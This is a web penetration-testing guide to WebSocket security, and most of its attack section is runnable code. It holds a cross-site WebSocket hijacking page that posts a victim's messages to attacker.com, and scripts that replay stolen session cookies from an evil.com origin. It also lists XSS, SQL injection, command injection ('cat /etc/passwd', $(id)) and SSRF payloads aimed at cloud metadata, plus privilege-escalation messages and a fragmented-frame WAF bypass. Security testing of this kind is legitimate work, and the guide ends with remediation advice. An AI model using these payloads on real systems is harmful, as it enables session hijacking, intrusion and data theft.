WebSocket Protocol Security (Deep Dive)
Severity: High | CWE: CWE-345, CWE-284, CWE-89 | OWASP: A01:2021 – Broken Access Control, A03:2021 – Injection
WebSocket Protocol vs. HTTP
WebSocket (RFC 6455) establishes a persistent, bidirectional, full-duplex channel over a single TCP connection. After the HTTP/1.1 upgrade handshake, the protocol operates independently of HTTP — separate authentication model, separate framing, separate proxy behavior. This creates attack surface that HTTP-focused defenses miss.
Key differences from HTTP:
- Stateful: session persists across messages; auth checked only at connection time (usually)
- No CORS: the browser does not apply SOP/CORS to WebSocket handshakes, so a page on any origin can open a connection unless the server validates the Origin header
- No headers per message: once connected, messages have no HTTP headers — auth must be embedded in message content or was checked at connection
- Framing: messages can be fragmented across frames — some IDS/WAF miss fragmented payloads
- Opcode abuse: binary frames, ping/pong, close frames — parsers can be confused
Upgrade handshake:
GET /ws HTTP/1.1
Host: target.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: BASE64_RANDOM
Sec-WebSocket-Version: 13
Origin: https://target.com   ← WAF may check this but often doesn't enforce

HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: BASE64(SHA1(KEY + GUID))
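The accept value in the server response can be reproduced by hand, which is useful when checking whether a proxy or a custom server really completed the handshake. A minimal sketch: the GUID is the fixed value from RFC 6455, the sample key is the one used in the RFC, and the function name compute_accept is only illustrative.

```python
import base64
import hashlib

# Fixed GUID that RFC 6455 appends to the client key.
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"


def compute_accept(sec_websocket_key: str) -> str:
    """Return the Sec-WebSocket-Accept value a compliant server should send."""
    digest = hashlib.sha1((sec_websocket_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


if __name__ == "__main__":
    # Sample key taken from RFC 6455, section 1.3
    print(compute_accept("dGhlIHNhbXBsZSBub25jZQ=="))
```

Note that the accept value only proves the server understood the handshake; it is not an authentication mechanism.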
Discovery Checklist
Phase 1 — WebSocket Identification
- Check browser DevTools → Network → WS filter for existing WebSocket connections
- Monitor Upgrade headers in HTTP traffic
- Check JavaScript for new WebSocket(, io(, SockJS(, Stomp., Phoenix.Socket
- Identify WebSocket subprotocols: Sec-WebSocket-Protocol header
- Check for Socket.IO (adds polling fallback): /socket.io/ path
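The JavaScript checks in Phase 1 can be partly automated. The sketch below scans downloaded script text for the indicators listed above; the pattern set and the function name find_ws_indicators are assumptions made for illustration, and regex matching will miss minified or dynamically built constructors.

```python
import re

# Patterns mirror the Phase 1 indicators; extend them for the target's stack.
WS_PATTERNS = {
    "native WebSocket": re.compile(r"new\s+WebSocket\s*\("),
    "Socket.IO": re.compile(r"\bio\s*\(|/socket\.io/"),
    "SockJS": re.compile(r"\bSockJS\s*\("),
    "STOMP": re.compile(r"\bStomp\."),
    "Phoenix": re.compile(r"\bPhoenix\.Socket\b"),
    "ws URL": re.compile(r"\bwss?://[^\s\"'`]+"),
}


def find_ws_indicators(js_source: str) -> dict:
    """Map each indicator label to the substrings that matched in js_source."""
    hits = {}
    for label, pattern in WS_PATTERNS.items():
        matches = pattern.findall(js_source)
        if matches:
            hits[label] = matches
    return hits


if __name__ == "__main__":
    sample = 'const s = new WebSocket("wss://target.com/ws"); const c = io("/chat");'
    for label, matches in find_ws_indicators(sample).items():
        print(f"{label}: {matches}")
```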
Phase 2 — Authentication Analysis
- Is auth token sent in handshake URL? (?token=, ?auth=)
- Is auth token sent in Sec-WebSocket-Protocol header (hack for browser limitations)?
- Is auth checked only at connection or on each message?
- Does re-connecting with different auth token change session?
- Can connection survive session expiry?
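To answer the first Phase 2 questions quickly, a captured handshake request can be inspected for every place a credential might travel. This is a rough sketch: the parameter names in TOKEN_PARAMS and the function name locate_credentials are assumptions, and a Sec-WebSocket-Protocol hit only means the header should be inspected manually for an embedded token.

```python
from urllib.parse import parse_qs, urlsplit

# Query parameter names that commonly carry tokens (assumed list, extend as needed).
TOKEN_PARAMS = {"token", "auth", "access_token", "jwt"}


def locate_credentials(raw_handshake: str) -> list:
    """Return labels for each place the handshake request carries credentials."""
    lines = raw_handshake.strip().splitlines()
    request_line, header_lines = lines[0], lines[1:]
    findings = []

    # Request line looks like: GET /ws?token=abc HTTP/1.1
    target = request_line.split()[1]
    query = parse_qs(urlsplit(target).query)
    for name in sorted(TOKEN_PARAMS & set(query)):
        findings.append(f"url-parameter:{name}")

    headers = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()

    if "cookie" in headers:
        findings.append("cookie")
    if "authorization" in headers:
        findings.append("authorization-header")
    if "sec-websocket-protocol" in headers:
        findings.append("subprotocol-header")
    return findings


if __name__ == "__main__":
    captured = (
        "GET /ws?token=abc HTTP/1.1\r\n"
        "Host: target.com\r\n"
        "Cookie: session=x\r\n"
        "Sec-WebSocket-Protocol: access_token, eyJ\r\n\r\n"
    )
    print(locate_credentials(captured))
```

Cookie-only authentication is the case that makes CSWSH possible; URL tokens are the case that leaks into logs.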
Phase 3 — Message Structure
- Identify message format: JSON, binary, custom text protocol, MessagePack
- Map all message types/events (event-driven: {type: "message", data: ...})
- Identify which messages trigger server-side actions (vs. broadcast)
- Identify user-controlled fields in each message type
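Mapping message types is easier with a small helper that groups captured messages by type and records which fields each type carries. The sketch assumes JSON messages with a "type" key, as in the example above; the function name map_message_types and the type_key parameter are illustrative, and binary or MessagePack traffic would need its own decoder.

```python
import json
from collections import defaultdict


def map_message_types(raw_messages, type_key="type"):
    """Group captured JSON messages by type and list the fields seen for each."""
    schema = defaultdict(set)
    for raw in raw_messages:
        try:
            msg = json.loads(raw)
        except (TypeError, ValueError):
            continue  # not JSON (binary frame, custom text protocol, ...)
        if isinstance(msg, dict) and type_key in msg:
            schema[msg[type_key]].update(k for k in msg if k != type_key)
    return {msg_type: sorted(fields) for msg_type, fields in schema.items()}


if __name__ == "__main__":
    captured = [
        '{"type": "send_message", "room": "general", "content": "hi"}',
        '{"type": "send_message", "content": "x", "replyTo": 5}',
        '{"type": "get_profile"}',
        "not json",
    ]
    for msg_type, fields in map_message_types(captured).items():
        print(msg_type, fields)
```

The field lists double as a starting point for the user-controlled inputs to fuzz in each message type.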
Payload Library
Payload 1 — Cross-Site WebSocket Hijacking (CSWSH)
<!DOCTYPE html>
<!-- CSWSH: attacker page connects to victim's WebSocket using victim's cookies -->
<!-- Prerequisite: target allows cross-origin WebSocket connections (no Origin check) -->
<html>
<body>
<script>
const VICTIM_WS = "wss://target.com/ws/chat";
const EXFIL = "https://attacker.com/steal";
var ws = new WebSocket(VICTIM_WS);
// Browser attaches the target's cookies to the cross-site WebSocket handshake
// (unless the cookie's SameSite attribute is Lax or Strict, which blocks them)
ws.onopen = function() {
console.log('[*] Connected to victim WebSocket');
// Subscribe to sensitive events:
ws.send(JSON.stringify({type: "subscribe", channel: "private"}));
ws.send(JSON.stringify({type: "get_history", limit: 100}));
ws.send(JSON.stringify({type: "get_profile"}));
};
ws.onmessage = function(event) {
console.log('[*] Message:', event.data);
// Exfiltrate all messages:
fetch(EXFIL, {
method: "POST",
body: JSON.stringify({msg: event.data, ts: Date.now()}),
mode: "no-cors"
});
};
ws.onerror = function(e) {
console.log('[*] Error:', e);
// If error → Origin is likely enforced → no CSWSH
};
</script>
<p>Loading...</p>
</body>
</html>
#!/usr/bin/env python3
"""
CSWSH test from the attacker's perspective: check whether the Origin header is enforced
"""
import json

import websocket  # pip install websocket-client

TARGET_WS = "wss://target.com/ws"
VICTIM_COOKIE = "session=VICTIM_SESSION_VALUE"
# Certificate checks are disabled so lab targets with self-signed certs still work
SSLOPT = {"check_hostname": False, "cert_reqs": 0}


def test_cswsh():
    headers = {
        "Cookie": VICTIM_COOKIE,
        "Origin": "https://evil.com",  # Different origin; should be rejected if protected
        "User-Agent": "Mozilla/5.0",
    }
    try:
        ws = websocket.create_connection(TARGET_WS, header=headers, sslopt=SSLOPT)
        print("[!!!] CSWSH POSSIBLE: Connection accepted from evil.com origin!")
        # Try to read sensitive data:
        ws.send(json.dumps({"type": "get_messages", "limit": 50}))
        ws.send(json.dumps({"type": "get_profile"}))
        ws.send(json.dumps({"type": "list_friends"}))
        # Collect responses until the 5-second timeout fires or the server closes:
        ws.settimeout(5)
        while True:
            try:
                msg = ws.recv()
                print(f"[DATA] {msg[:200]}")
            except Exception:
                break
        ws.close()
    except Exception as e:
        print(f"[ ] Connection rejected (likely Origin check enforced): {e}")


# Also test without Origin header:
def test_no_origin():
    try:
        ws = websocket.create_connection(
            TARGET_WS,
            header={"Cookie": VICTIM_COOKIE},
            sslopt=SSLOPT,
        )
        print("[!] Connection accepted without Origin header")
        ws.close()
    except Exception as e:
        print(f"[ ] No-Origin rejected: {e}")


test_cswsh()
test_no_origin()
Payload 2 — Authentication Bypass at Reconnect
#!/usr/bin/env python3
"""
Test if WebSocket auth is re-checked on reconnect
If auth token expires but existing connection persists → zombie connection
If new connection with expired token is accepted → auth bypass
"""
import json
import time
from datetime import datetime, timedelta

import websocket  # pip install websocket-client

TARGET_WS = "wss://target.com/ws"
SSLOPT = {"check_hostname": False, "cert_reqs": 0}
TOKEN_LIFETIME_SECONDS = 300  # set this to the real lifetime of your test token


# Scenario 1: Connect with valid token, let it expire, continue using connection:
def test_token_expiry_on_existing_connection():
    # Connect with valid short-lived token (e.g., 5 min token):
    VALID_TOKEN = "eyJ..."  # your valid JWT
    ws = websocket.create_connection(
        TARGET_WS,
        header={"Authorization": f"Bearer {VALID_TOKEN}"},
        sslopt=SSLOPT,
    )
    print("[*] Connected with valid token")
    # Wait until the token has expired (or shorten exp in a test environment):
    wait = TOKEN_LIFETIME_SECONDS + 30
    print(f"[*] Waiting {wait} seconds for the token to expire...")
    time.sleep(wait)
    # The token is now expired; a server that re-validates should have kicked the connection:
    try:
        ws.send(json.dumps({"type": "get_sensitive_data"}))
        response = ws.recv()
        print(f"[!!!] Data received with expired token: {response[:200]}")
    except Exception as e:
        print(f"[ ] Connection closed after token expiry: {e}")
    finally:
        ws.close()


# Scenario 2: Reconnect with expired/invalid token:
def test_expired_token_reconnect():
    # Claims for an expired JWT (only useful if you know the secret, i.e. when testing your own app).
    # With PyJWT this could be signed as jwt.encode(EXPIRED_PAYLOAD, SECRET, algorithm="HS256"),
    # where SECRET is a placeholder for your app's signing key.
    EXPIRED_PAYLOAD = {
        "sub": "user123",
        "exp": int((datetime.now() - timedelta(hours=1)).timestamp()),  # expired 1 hour ago
        "iat": int((datetime.now() - timedelta(hours=2)).timestamp()),
    }
    # Expired token string:
    EXPIRED_TOKEN = "eyJ..."  # capture a real expired token
    try:
        ws = websocket.create_connection(
            TARGET_WS,
            header={"Authorization": f"Bearer {EXPIRED_TOKEN}"},
            sslopt=SSLOPT,
        )
        print("[!!!] Connected with EXPIRED token!")
        ws.send(json.dumps({"type": "ping"}))
        print(f"[!!!] Response: {ws.recv()}")
        ws.close()
    except Exception as e:
        print(f"[ ] Expired token rejected: {e}")


# Scenario 3: Token in URL parameter (may be logged):
def test_token_in_url():
    TOKEN = "VALID_TOKEN"
    ws_url = f"wss://target.com/ws?token={TOKEN}"
    ws = websocket.create_connection(ws_url, sslopt=SSLOPT)
    print("[*] Connected via URL token")
    # Issue: token visible in server logs, proxy logs, Referer headers
    ws.close()


if __name__ == "__main__":
    test_expired_token_reconnect()
    test_token_in_url()
    test_token_expiry_on_existing_connection()  # slow: sleeps until the token expires
Payload 3 — Message-Level Injection
#!/usr/bin/env python3
"""
Test injection payloads in WebSocket message fields
"""
import json
import time

import websocket  # pip install websocket-client

TARGET_WS = "wss://target.com/ws/chat"
AUTH_TOKEN = "YOUR_VALID_TOKEN"

ws = websocket.create_connection(
    TARGET_WS,
    header={"Authorization": f"Bearer {AUTH_TOKEN}"},
    sslopt={"check_hostname": False, "cert_reqs": 0},
)


def send_and_recv(payload):
    """Send one JSON message and return the next response, if any arrives within 2 seconds."""
    ws.send(json.dumps(payload))
    time.sleep(0.5)
    try:
        ws.settimeout(2)
        return ws.recv()
    except Exception:
        return "(no response)"


# XSS via message content:
xss_payloads = [
    "<script>alert(document.domain)</script>",
    "<img src=x onerror=alert(1)>",
    "javascript:alert(1)",
    "${alert(1)}",  # template literal injection in JS client
    "{{constructor.constructor('alert(1)')()}}",  # AngularJS CSTI via WS message
]
print("[*] Testing XSS in message content:")
for xss in xss_payloads:
    r = send_and_recv({"type": "send_message", "room": "general", "content": xss})
    print(f"  {xss[:40]} → {r[:100]}")

# SQL injection via search/query messages:
sqli_payloads = [
    "' OR '1'='1",
    "'; DROP TABLE messages-- -",
    "' UNION SELECT null,password FROM users-- -",
    "' AND SLEEP(3)-- -",
]
print("\n[*] Testing SQLi in search:")
for sqli in sqli_payloads:
    start = time.time()
    r = send_and_recv({"type": "search_messages", "query": sqli})
    elapsed = time.time() - start  # a delay near 3s on the SLEEP payload suggests time-based SQLi
    print(f"  {sqli[:40]} → {elapsed:.1f}s, {r[:100]}")

# Command injection via filenames/paths in messages:
cmdi_payloads = [
    "test; id",
    "test | cat /etc/passwd",
    "test`id`",
    "$(id)",
]
print("\n[*] Testing CMDi in file operations:")
for cmdi in cmdi_payloads:
    r = send_and_recv({"type": "upload_file", "filename": cmdi, "content": "test"})
    print(f"  {cmdi} → {r[:100]}")

# SSRF via URL fields:
ssrf_payloads = [
    "http://169.254.169.254/latest/meta-data/",
    "http://127.0.0.1:6379/",
    "http://internal.corp.net:8080/admin",
    "file:///etc/passwd",
]
print("\n[*] Testing SSRF via URL fields:")
for url in ssrf_payloads:
    r = send_and_recv({"type": "fetch_preview", "url": url})
    print(f"  {url} → {r[:200]}")

ws.close()
Payload 4 — WebSocket Authorization Bypass
#!/usr/bin/env python3
"""
Test authorization on WebSocket message types
Many apps check auth at connection but not per-message
"""
import json
import time

import websocket  # pip install websocket-client

TARGET_WS = "wss://target.com/ws"
USER_TOKEN = "USER_LEVEL_TOKEN"  # non-admin token

ws = websocket.create_connection(
    TARGET_WS,
    header={"Authorization": f"Bearer {USER_TOKEN}"},
    sslopt={"check_hostname": False, "cert_reqs": 0},
)


def send(payload):
    """Send one JSON message and return the next response, if any arrives within 2 seconds."""
    ws.send(json.dumps(payload))
    time.sleep(0.3)
    try:
        ws.settimeout(2)
        return ws.recv()
    except Exception:
        return "(no response / connection closed)"


# Test admin message types with user token:
admin_messages = [
    # User management:
    {"type": "admin:list_users"},
    {"type": "admin:get_user", "userId": "admin"},
    {"type": "admin:delete_user", "userId": "victim_user"},
    {"type": "admin:change_role", "userId": "ATTACKER_USER", "role": "admin"},
    # System operations:
    {"type": "system:exec", "cmd": "id"},
    {"type": "system:logs"},
    {"type": "debug:dump_state"},
    # Data access:
    {"type": "get_all_messages"},
    {"type": "subscribe", "channel": "admin"},
    {"type": "read_private_messages", "userId": "OTHER_USER"},
]
print("[*] Testing admin/privileged message types:")
for msg in admin_messages:
    r = send(msg)
    # Look for anything other than "unauthorized" or "forbidden":
    if not any(x in r.lower() for x in ["unauthorized", "forbidden", "permission", "error"]):
        print(f"  [!!!] {msg['type']} → {r[:200]}")
    else:
        print(f"  [ ] {msg['type']}: {r[:80]}")

# IDOR via WebSocket: access other users' data
print("\n[*] Testing IDOR via WebSocket:")
for user_id in ["1", "2", "3", "admin", "VICTIM_USER_ID"]:
    r = send({"type": "get_private_data", "userId": user_id})
    if "email" in r or "password" in r or "phone" in r:
        print(f"  [!!!] IDOR: userId={user_id} → {r[:200]}")
    else:
        print(f"  [ ] userId={user_id}: {r[:60]}")

ws.close()
Payload 5 — Frame-Level Protocol Attacks
#!/usr/bin/env python3
"""
WebSocket frame-level attacks
"""
import socket, ssl, struct, base64, hashlib, json, os, time

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # fixed GUID from RFC 6455


def websocket_handshake(host, port, path="/ws", token=None, use_tls=True):
    """Raw WebSocket handshake"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if use_tls:
        context = ssl.create_default_context()
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE
        sock = context.wrap_socket(sock, server_hostname=host)
    sock.connect((host, port))
    key = base64.b64encode(os.urandom(16)).decode()
    expected_accept = base64.b64encode(
        hashlib.sha1((key + WS_GUID).encode()).digest()
    ).decode()
    headers = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}:{port}",
        "Upgrade: websocket",
        "Connection: Upgrade",
        f"Sec-WebSocket-Key: {key}",
        "Sec-WebSocket-Version: 13",
        "Origin: https://evil.com",  # Test origin bypass
    ]
    if token:
        headers.append(f"Authorization: Bearer {token}")
    sock.sendall(("\r\n".join(headers) + "\r\n\r\n").encode())
    response = sock.recv(4096).decode(errors="replace")
    if "101 Switching Protocols" in response:
        if expected_accept not in response:
            print("[!] Sec-WebSocket-Accept is missing or does not match the key")
        print("[+] Handshake OK")
        return sock
    print(f"[-] Handshake failed: {response[:200]}")
    sock.close()
    return None


def send_frame(sock, payload, opcode=0x01, masked=True, fin=True):
    """Send a single WebSocket frame"""
    payload_bytes = payload.encode() if isinstance(payload, str) else payload
    length = len(payload_bytes)
    header = bytes([(0x80 if fin else 0x00) | opcode])  # FIN bit + opcode
    mask_bit = 0x80 if masked else 0x00
    if length < 126:
        header += bytes([mask_bit | length])
    elif length < 65536:
        header += bytes([mask_bit | 126]) + struct.pack("!H", length)
    else:
        header += bytes([mask_bit | 127]) + struct.pack("!Q", length)
    if masked:
        mask = os.urandom(4)
        masked_payload = bytes(b ^ mask[i % 4] for i, b in enumerate(payload_bytes))
        sock.sendall(header + mask + masked_payload)
    else:
        sock.sendall(header + payload_bytes)


# Fragmented frame injection (WAF bypass):
def send_fragmented(sock, payload):
    """Split payload across two frames"""
    data = payload.encode() if isinstance(payload, str) else payload
    mid = len(data) // 2
    # First fragment: FIN=0, opcode=text(1)
    send_frame(sock, data[:mid], opcode=0x01, fin=False)
    # Continuation frame: FIN=1, opcode=continuation(0)
    send_frame(sock, data[mid:], opcode=0x00, fin=True)


# Test: connect and send fragmented SQLi (may bypass WAF):
sock = websocket_handshake("target.com", 443, "/ws", token="TOKEN", use_tls=True)
if sock:
    # Send normal message:
    send_frame(sock, json.dumps({"type": "search", "query": "test"}))
    # Send fragmented injection:
    payload = json.dumps({"type": "search", "query": "' OR '1'='1"})
    send_fragmented(sock, payload)
    time.sleep(1)
    print(f"Response: {sock.recv(4096)}")
    sock.close()
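The fragmentation bypass works only when the inspecting component looks at frames one at a time. For comparison, here is a minimal sketch of what correct inspection has to do: unmask each frame and reassemble the message before matching anything. It assumes the buffer holds only complete frames; the function names parse_frames, reassemble_messages and client_frame are illustrative.

```python
import struct


def parse_frames(buf: bytes):
    """Yield (fin, opcode, payload) for each frame in buf (complete frames assumed)."""
    pos = 0
    while pos + 2 <= len(buf):
        b0, b1 = buf[pos], buf[pos + 1]
        fin, opcode = bool(b0 & 0x80), b0 & 0x0F
        masked, length = bool(b1 & 0x80), b1 & 0x7F
        pos += 2
        if length == 126:
            (length,) = struct.unpack("!H", buf[pos:pos + 2])
            pos += 2
        elif length == 127:
            (length,) = struct.unpack("!Q", buf[pos:pos + 8])
            pos += 8
        mask = b""
        if masked:
            mask = buf[pos:pos + 4]
            pos += 4
        payload = buf[pos:pos + length]
        pos += length
        if masked:
            payload = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
        yield fin, opcode, payload


def reassemble_messages(buf: bytes) -> list:
    """Join fragments into whole messages; control frames (opcode >= 0x8) are skipped."""
    messages, parts = [], []
    for fin, opcode, payload in parse_frames(buf):
        if opcode >= 0x8:
            continue  # ping/pong/close may be interleaved between fragments
        parts.append(payload)
        if fin:
            messages.append(b"".join(parts))
            parts = []
    return messages


def client_frame(fin: bool, opcode: int, payload: bytes, mask: bytes = b"\x01\x02\x03\x04") -> bytes:
    """Build a small masked frame (payload under 126 bytes) for the demo below."""
    head = bytes([(0x80 if fin else 0x00) | opcode, 0x80 | len(payload)])
    return head + mask + bytes(b ^ mask[i % 4] for i, b in enumerate(payload))


if __name__ == "__main__":
    stream = client_frame(False, 0x1, b"' OR ") + client_frame(True, 0x0, b"'1'='1")
    print(reassemble_messages(stream))
```

A signature applied to either fragment alone never sees the full string; applied to the reassembled message, it does.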
Payload 6 — Socket.IO Specific Attacks
#!/usr/bin/env python3
"""
Socket.IO-specific attack patterns
Socket.IO adds an event-based protocol on top of WebSocket
"""
import time

import requests
import socketio  # pip install python-socketio

# Socket.IO client:
sio = socketio.Client()
TARGET = "https://target.com"
AUTH_TOKEN = "USER_TOKEN"


@sio.event
def connect():
    print('[*] Connected to Socket.IO server')
    # Enumerate common event names:
    for event in ['join_room', 'subscribe', 'get_messages', 'admin:users',
                  'debug', 'system', 'broadcast']:
        try:
            sio.emit(event, {})
        except Exception as e:
            print(f'[ ] emit {event} failed: {e}')


@sio.event
def message(data):
    print(f'[DATA] message: {data}')


@sio.on('*')  # Catch all events:
def catch_all(event, data):
    print(f'[EVENT] {event}: {data}')


# Connect with auth:
try:
    sio.connect(TARGET, auth={"token": AUTH_TOKEN},
                transports=['websocket'])  # force WebSocket, skip polling
except Exception as e:
    print(f"Error: {e}")

# Test namespace escalation:
# Socket.IO supports namespaces: /admin, /system
# (python-socketio selects them with the namespaces argument, not the URL path)
admin_sio = socketio.Client()
try:
    admin_sio.connect(TARGET, namespaces=['/admin'], auth={"token": AUTH_TOKEN},
                      transports=['websocket'])
    print("[!!!] Connected to /admin namespace with user token!")
    admin_sio.emit('list_users', {}, namespace='/admin')
    time.sleep(2)
    admin_sio.disconnect()
except Exception as e:
    print(f"[ ] Admin namespace rejected: {e}")

# CSWSH via Socket.IO polling (HTTP-based fallback):
r = requests.get(f"{TARGET}/socket.io/?EIO=4&transport=polling",
                 cookies={"session": "VICTIM_SESSION"})
print(f"[*] Polling response (CSWSH test): {r.status_code} {r.text[:100]}")
sio.disconnect()
Tools
# wscat — WebSocket command-line client:
npm install -g wscat
wscat -c "wss://target.com/ws" \
-H "Authorization: Bearer TOKEN" \
-H "Origin: https://target.com"
# websocat — versatile WebSocket tool (nc equivalent):
cargo install websocat
# Or: apt install websocat
websocat "wss://target.com/ws" --header="Authorization: Bearer TOKEN"
# Pipe stdin → WebSocket:
echo '{"type":"get_data"}' | websocat "wss://target.com/ws" -H "Authorization: Bearer TOKEN"
# wsrepl — interactive WebSocket REPL with history:
pip3 install wsrepl
wsrepl -u "wss://target.com/ws" --headers "Authorization: Bearer TOKEN"
# Burp Suite — WebSocket interception:
# Proxy → WebSockets history → intercept WS messages
# Repeater supports WebSocket (repeater type: WebSocket)
# Intruder: send WebSocket message to Intruder for fuzzing
# wsfuzz — WebSocket fuzzer:
pip3 install wsfuzz
# OWASP WebSocket security cheat sheet:
# https://cheatsheetseries.owasp.org/cheatsheets/WebSockets_Security_Cheat_Sheet.html
# Detect WebSocket in passive recon:
curl -si "https://target.com/" | grep -i "upgrade\|websocket"
grep -r "WebSocket\|ws://" site_js/ 2>/dev/null | head -20
# Socket.IO client for testing:
pip3 install python-socketio
npm install socket.io-client # JS alternative
# Test CSWSH with Burp Collaborator integration:
# Connect to victim WS using collaborator URL as exfil:
python3 -c "
import websocket, json
ws = websocket.create_connection('wss://target.com/ws',
header={'Cookie': 'session=VICTIM_SESSION', 'Origin': 'https://evil.com'},
sslopt={'check_hostname': False, 'cert_reqs': 0})
ws.send(json.dumps({'type': 'get_all'}))
print(ws.recv())
ws.close()
"
Remediation Reference
- Origin validation in WebSocket handshake: check the Origin header on the server during the WebSocket upgrade and reject connections from unauthorized origins; this is the primary CSWSH mitigation
- CSRF token in handshake: if cookie-based auth is used, require a CSRF token as a URL parameter or in Sec-WebSocket-Protocol during handshake
- Re-authenticate on reconnect: validate auth token on every new WebSocket connection, not just the first; do not trust that “existing connection = authenticated”
- Per-message authorization: check authorization for every message that triggers a privileged action — connection-level auth is not sufficient for event-based systems
- Sanitize all message fields: treat WebSocket message content as untrusted input — apply the same injection prevention as REST API parameters
- Message validation schema: define and enforce a schema for each message type; reject malformed or unexpected fields
- Rate limiting on message processing: apply rate limits on expensive or sensitive operations triggered via WebSocket messages
- TLS for all WebSocket connections: always use wss:// (WebSocket Secure), because ws:// transmits in cleartext; enforce this server-side by rejecting non-TLS connections
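Three of the items above (Origin validation, per-message authorization, message schema) can be sketched without tying them to a framework. The allowlist, role names, message rules, and function names below are all hypothetical; a real server would call these checks from its upgrade handler and its message dispatcher.

```python
from urllib.parse import urlsplit

ALLOWED_ORIGINS = {"https://target.com"}  # hypothetical allowlist

# Hypothetical rules: message type -> (minimum role, fields allowed besides "type")
MESSAGE_RULES = {
    "send_message": ("user", {"room", "content"}),
    "admin:list_users": ("admin", set()),
}
ROLE_RANK = {"user": 1, "admin": 2}


def origin_allowed(origin_header) -> bool:
    """Exact-match the Origin header against the allowlist during the upgrade."""
    if not origin_header:
        return False  # no Origin: reject here, or handle non-browser clients explicitly
    parts = urlsplit(origin_header)
    return f"{parts.scheme}://{parts.netloc}".lower() in ALLOWED_ORIGINS


def authorize_message(session_role: str, message: dict):
    """Check role and field schema for one message; returns (allowed, reason)."""
    rule = MESSAGE_RULES.get(message.get("type"))
    if rule is None:
        return False, "unknown message type"
    required_role, allowed_fields = rule
    if ROLE_RANK.get(session_role, 0) < ROLE_RANK[required_role]:
        return False, "forbidden"
    unexpected = set(message) - allowed_fields - {"type"}
    if unexpected:
        return False, f"unexpected fields: {sorted(unexpected)}"
    return True, "ok"


if __name__ == "__main__":
    print(origin_allowed("https://target.com.evil.com"))
    print(authorize_message("user", {"type": "admin:list_users"}))
    print(authorize_message("user", {"type": "send_message", "room": "general", "content": "hi"}))
```

Exact matching on scheme and host is deliberate: substring or prefix checks on Origin are a common source of bypasses.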
Part of the Web Application Penetration Testing Methodology series.